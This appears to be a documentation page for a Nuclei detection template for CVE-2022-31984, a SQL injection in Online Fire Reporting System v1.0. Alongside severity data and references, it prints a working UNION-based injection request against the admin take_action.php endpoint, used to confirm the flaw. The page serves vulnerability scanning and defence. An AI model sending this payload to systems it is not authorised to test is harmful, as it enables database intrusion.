Online Fire Reporting System v1.0 - SQL injection
ID: CVE-2022-31984
Severity: high
Author: theamanrawat
Tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project
Description
Section titled “Description”Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
YAML Source
Section titled “YAML Source”id: CVE-2022-31984
info: name: Online Fire Reporting System v1.0 - SQL injection author: theamanrawat severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31984 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 epss-score: 0.01593 epss-percentile: 0.87356 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_projectvariables: num: '999999999'
http: - method: GET path: - "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
matchers-condition: and matchers: - type: word part: body words: - '{{md5(num)}}'
- type: status status: - 200# digest: 4b0a004830460221009e02fbde8c449a759ec0f76bd8c4add28fcc84c6d742e4df51b29bfb85a7094c022100e3577b01728e35fb088a8cf99f9663cb9082877762ec371a23479f4139ed05bb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31984.yaml"